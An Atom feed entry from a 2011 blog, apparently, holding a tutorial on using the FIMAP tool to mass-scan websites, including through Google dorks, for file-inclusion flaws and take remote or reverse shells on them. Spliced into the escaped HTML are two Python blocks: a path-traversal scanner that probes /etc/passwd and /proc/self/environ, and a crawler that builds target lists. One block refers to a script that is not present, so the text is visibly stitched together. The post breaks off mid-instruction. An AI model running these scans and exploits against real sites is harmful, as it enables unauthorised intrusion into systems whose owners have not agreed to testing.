<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:gd="http://schemas.google.com/g/2005" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;D0EGQXc9cCp7ImA9WhdXEUw.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831</id><updated>2011-08-23T11:07:00.968-05:00</updated><title>Kaotic Creations</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://kaoticcreations.blogspot.com/" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>17</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/blogspot/CWtAZ" /><feedburner:info uri="blogspot/cwtaz" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;CUQASX07fCp7ImA9WhdQF0U.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-2094454163405034310</id><published>2011-08-19T14:49:00.000-05:00</published><updated>2011-08-19T14:49:08.304-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-19T14:49:08.304-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="/etc/passwd" /><category 
scheme="http://www.blogger.com/atom/ns#" term="/proc/self/environ" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI" /><category scheme="http://www.blogger.com/atom/ns#" term="Local File Include" /><category scheme="http://www.blogger.com/atom/ns#" term="RFI" /><category scheme="http://www.blogger.com/atom/ns#" term="File Inclusion" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI Exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="Database Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI Scanner" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Log Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI Hack" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI to Remote Shell" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI Shell" /><title>AUTOMATED LFI/RFI SCANNING &amp; EXPLOITING WITH FIMAP</title><content type="html">&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Today I am going to show you how to use a Python based tool called FIMAP to perform automated LFI exploitation and gain shell access on a target site. Hunting for LFI vulnerabilities is much like hunting for SQL injection, only more time consuming, and these days fewer and fewer machines are vulnerable out of the box. Manually crafting the requests to test for LFI (every traversal depth, with and without a null byte, for every candidate file) is painstaking, which is why I find FIMAP so helpful: it automates the whole process and ships with built-in exploits that actually work, which speeds things up and improves our chances of getting a remote shell. It can run single target scans, Google dork scans, and mass scans from a list file. It can also crawl a target site and create a list file to feed into the mass scan mode afterwards. Here goes…&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Pre-requisites:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Python installed on system already&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Download copy of FIMAP here: &lt;a href="http://code.google.com/p/fimap/downloads/list"&gt;http://code.google.com/p/fimap/downloads/list&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span 
style="font-family: Calibri;"&gt;Brain power &amp;amp; patience &lt;/span&gt;&lt;span style="font-family: Wingdings; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;"&gt;&lt;span style="mso-char-type: symbol; mso-symbol-font-family: Wingdings;"&gt;J&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Assuming you already have Python installed, download the latest version of FIMAP from its Google Code home, extract it to your desired location and we can begin. Open a command prompt and navigate to the extraction directory (unless you added it to your PATH). Run “fimap.py -h” to see a quick overview of the available options; it should look like this:&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img217.imageshack.us/img217/5408/22221768.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" qaa="true" src="http://img217.imageshack.us/img217/5408/22221768.png" width="373" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;It looks like a lot at first but once you review it is fairly easy to pick up on the syntax and options, as you will find most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs LFI check and audit against a single url. You just supply the URL to scan and it goes to work.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;COMMAND:&lt;/strong&gt; fimap.py -s -u "http://target-site.com/index2.php?x="&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
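What a single scan does under the hood, as an added example that is not part of the original post and is not fimap's own code: the scanner below builds the same traversal matrix (every depth, with and without a trailing %00) for /etc/passwd and /proc/self/environ and looks for a content signature in each response. The target is a constructed in-memory stand-in for a PHP page that does include('pages/' . $_GET['x'] . '.php'); the directory layout, the file contents and the hardened allow-list variant are assumptions made for the demo, and fetch is whatever sends the parameter to a real target.

```python
import re
from urllib.parse import unquote

# Constructed in-memory filesystem standing in for the target host (demo data, not a real server).
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
    "/proc/self/environ": "DOCUMENT_ROOT=/var/www/html\x00HTTP_USER_AGENT=Mozilla/5.0\x00",
    "/var/www/html/pages/home.php": "home page",
    "/var/www/html/pages/about.php": "about page",
}
PAGES_DIR = "/var/www/html/pages"   # assumed location of the include directory


def normalize(path):
    """Collapse '.' and '..' the way the OS does when the file is opened."""
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def vulnerable_include(x, null_byte_truncation=True):
    """Emulates  include('pages/' . $_GET['x'] . '.php')  on a PHP build that
    still truncates file names at a NUL byte (pre-5.3.4); on newer builds the
    include simply fails when a NUL is present."""
    raw = unquote(x)
    if "\x00" in raw:
        if not null_byte_truncation:
            return "Warning: include(): filename contains a null byte"
        target = raw.split("\x00", 1)[0]          # the appended '.php' is cut off
    else:
        target = raw + ".php"
    full = normalize(PAGES_DIR + "/" + target)
    return FAKE_FS.get(full, "Warning: include(%s): failed to open stream" % full)


ALLOWED_PAGES = {"home", "about"}


def hardened_include(x):
    """Allow-list version: the parameter selects a page name, never a path."""
    if x not in ALLOWED_PAGES:
        return "404 Not Found"
    return FAKE_FS[PAGES_DIR + "/" + x + ".php"]


# Files to probe for, and the content signature proving the file came back.
SIGNATURES = {
    "/etc/passwd": re.compile(r"root:x:0:0:"),
    "/proc/self/environ": re.compile(r"DOCUMENT_ROOT=|HTTP_USER_AGENT="),
}


def payloads(max_depth=8):
    """Yield (payload, file) pairs: each file at every traversal depth, with and
    without a trailing %00 (the same matrix the Perl script below walks by hand)."""
    for target in SIGNATURES:
        for depth in range(max_depth + 1):
            base = "../" * depth + target.lstrip("/")
            yield base, target
            yield base + "%00", target


def scan(fetch, max_depth=8):
    """Return every payload whose response carries the expected signature.
    fetch(payload) is whatever sends the parameter to the target and returns the body."""
    hits = []
    for payload, target in payloads(max_depth):
        if SIGNATURES[target].search(fetch(payload)):
            hits.append((payload, target))
    return hits


if __name__ == "__main__":
    for payload, target in scan(vulnerable_include):
        print("VULNERABLE: x=%s reads %s" % (payload, target))
    print("hardened:", scan(hardened_include))
```

The matrix makes the point of the tool: without the null byte the appended .php suffix means no depth ever hits, on a PHP build that no longer truncates at NUL the include fails outright and the scan comes back empty, and the allow-list version never maps user input to a path at all. The first hit on the vulnerable page is at depth four with %00, because the include directory sits four levels below the root in this layout.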
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you are only going to scan a single site, I highly suggest running it through harvest mode first to increase the chances of finding a vulnerable link. Point FIMAP at the root of the site in harvest mode and it generates an output file you can feed into the mass scan. It looks like this:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;COMMAND:&lt;/strong&gt; fimap.py -H -u http://target-site.com/ -w output.txt&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt 0.5in;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE&lt;/b&gt;: you can set the crawl depth with the “-d &amp;lt;depth&amp;gt;” flag, i.e. how many link levels to follow from the start page; the default is 1&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt 0.5in;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;COMMAND:&lt;/strong&gt; fimap.py -H -u http://target-site.com/ -d 3 -w output.txt&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Now that we have our output file we can follow things up by switching to the Mass scan mode and audit all of the links we found when we used the Harvester mode. You just point it to the output.txt file from above steps and let it do its thing, like so:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;COMMAND:&lt;/strong&gt; fimap.py -m -l /path/to/list/output.txt&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
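The harvest step in code, as an added example that is not part of the original post and is not fimap's own crawler: a breadth-first crawler that follows links from the start URL to a given depth, stays on the starting host, collects every URL carrying a query string and writes them one per line, which is the list layout the mass scan (-l) consumes. The site it crawls is a constructed in-memory sample; the URLs, page contents and the fetch stand-in are assumptions for the demo.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

# Anchor tag template; \x3c and \x3e are the angle brackets.
ANCHOR = '\x3ca href="{0}"\x3e{1}\x3c/a\x3e'

# Constructed sample site (demo data): URL to HTML body.
SITE = {
    "http://target-site.com/":
        ANCHOR.format("/index2.php?x=home", "Home")
        + ANCHOR.format("/about.html", "About")
        + ANCHOR.format("http://other.example/", "Partner"),
    "http://target-site.com/index2.php?x=home":
        ANCHOR.format("/about.html", "About"),
    "http://target-site.com/about.html":
        ANCHOR.format("/news.php?id=7", "News") + ANCHOR.format("/", "Back"),
    "http://target-site.com/news.php?id=7":
        ANCHOR.format("/news.php?id=8", "Next")
        + ANCHOR.format("view.php?page=contact#top", "Contact"),
    "http://target-site.com/news.php?id=8": "",
    "http://target-site.com/view.php?page=contact":
        ANCHOR.format("mailto:webmaster@target-site.com", "Mail"),
}


def fetch(url):
    """Stand-in for an HTTP GET against the constructed site."""
    return SITE.get(url, "")


class LinkParser(HTMLParser):
    """Collects the href of every anchor tag in a page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def injection_key(url):
    """Same script plus same parameter names is the same injection point,
    so news.php?id=7 and news.php?id=8 collapse to one entry."""
    s = urlsplit(url)
    names = tuple(sorted(k for k, _ in parse_qsl(s.query, keep_blank_values=True)))
    return (s.netloc, s.path, names)


def harvest(start, depth, fetch=fetch):
    """Breadth-first crawl from start for depth link levels, staying on the
    start host; returns the parameterised URLs found, one per injection point."""
    origin = urlsplit(start).netloc
    seen, queue = {start}, deque([(start, 0)])
    keys, found = set(), []
    while queue:
        url, level = queue.popleft()
        if urlsplit(url).query:
            key = injection_key(url)
            if key not in keys:
                keys.add(key)
                found.append(url)
        if level == depth:          # pages at the depth limit are not expanded
            continue
        parser = LinkParser()
        parser.feed(fetch(url))
        for href in parser.links:
            s = urlsplit(urljoin(url, href))
            if s.scheme not in ("http", "https") or s.netloc != origin:
                continue            # skip mailto:, javascript: and off-host links
            absolute = s._replace(fragment="").geturl()
            if absolute not in seen:
                seen.add(absolute)
                queue.append((absolute, level + 1))
    return found


def as_list_file(urls):
    """One URL per line, the layout the mass mode list (-l) is fed with."""
    return "".join(u + "\n" for u in urls)


if __name__ == "__main__":
    with open("output.txt", "w") as fh:
        fh.write(as_list_file(harvest("http://target-site.com/", 3)))
```

Unlike a plain crawl it collapses URLs that differ only in parameter values (news.php?id=7 and news.php?id=8) into one entry, since they are the same injection point; that keeps the mass scan from testing the same parameter twice. With depth 1 only the links on the start page are visited, which is why the default harvest usually needs a bigger -d to reach the deeper parameterised pages.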
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img190.imageshack.us/img190/5231/69082860.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" qaa="true" src="http://img190.imageshack.us/img190/5231/69082860.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img193.imageshack.us/img193/4710/65297278.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" qaa="true" src="http://img193.imageshack.us/img193/4710/65297278.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: Calibri;"&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;COMMAND:&lt;/b&gt; fimap.py -g -q "inurl:index2.php?x="&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img202.imageshack.us/img202/1969/64583092.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="118" qaa="true" src="http://img202.imageshack.us/img202/1969/64583092.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;It runs much like the mass scan mode until it reaches the end of the results…&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img812.imageshack.us/img812/174/84136487.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="118" qaa="true" src="http://img812.imageshack.us/img812/174/84136487.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE:&lt;/b&gt; You can tune the Google scan by setting the pause between Google requests with “--googlesleep=&amp;lt;time&amp;gt;” and the number of result pages to read with “-p &amp;lt;pages&amp;gt;”. If you set the number of pages you can also set the results per page with “--results=&amp;lt;10,25,50,100&amp;gt;”, 100 being the default. The full syntax looks like this: &lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;COMMAND:&lt;/b&gt; fimap.py -g -q "inurl:index2.php?x=" --googlesleep=5000 -p 15 --results=50&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Once your scans have run you will want to know where the results are stored. They land in two files, fimap_results (xml) and fimap-log (txt), which hold the results from all of your scans; the location depends on your system, so use the run box or the locate command to find them. You can also run “fimap.py -x” to get a list of possible targets to attempt exploitation against, in an easy to follow interactive session:&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;COMMAND:&lt;/b&gt; fimap.py -x&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img717.imageshack.us/img717/5560/10367127.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" qaa="true" src="http://img717.imageshack.us/img717/5560/10367127.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;/div&gt;&lt;br /&gt;
&amp;nbsp;&lt;/span&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img593.imageshack.us/img593/1286/64109387.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" qaa="true" src="http://img593.imageshack.us/img593/1286/64109387.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell for which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell so you will not be able to use services like SSH but you can use it to gain foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is end results from successful exploit using the fimap shell:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img560.imageshack.us/img560/6242/69351331.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="253" qaa="true" src="http://img560.imageshack.us/img560/6242/69351331.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;You can also play with the configuration file so that you can add some additional features. Most notably you can add support to test for RFI vulnerabilities as well. You simply add you hosting details for your shell of choice into the “config.py” file, save, and then perform quick test to see if it is working. Here are the lines that need to be edited (editable fields in &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;RED&lt;/span&gt;&lt;/b&gt;); I suggest using the FTP mode if you have the ability to host your shell somewhere:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;# FTP Mode&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["ftp"] = {}&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["ftp"]["ftp_host"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["ftp"]["ftp_user"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["ftp"]["ftp_pass"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: 
Calibri;"&gt;settings["dynamic_rfi"]["ftp"]["ftp_path"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;# A non existing file without suffix. Example: /home/imax/public_html/payload&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["ftp"]["http_map"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;# The mapped HTTP path of the file. Example: http://localhost/~imax/payload&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;# Local Mode&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["local"] = {}&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["local"]["local_path"] = &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;span style="color: red;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;# A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="font-family: Calibri;"&gt;settings["dynamic_rfi"]["local"]["http_map"]&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;= &lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: red;"&gt;None&lt;/span&gt;&lt;/b&gt;&lt;span style="color: red;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;# The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
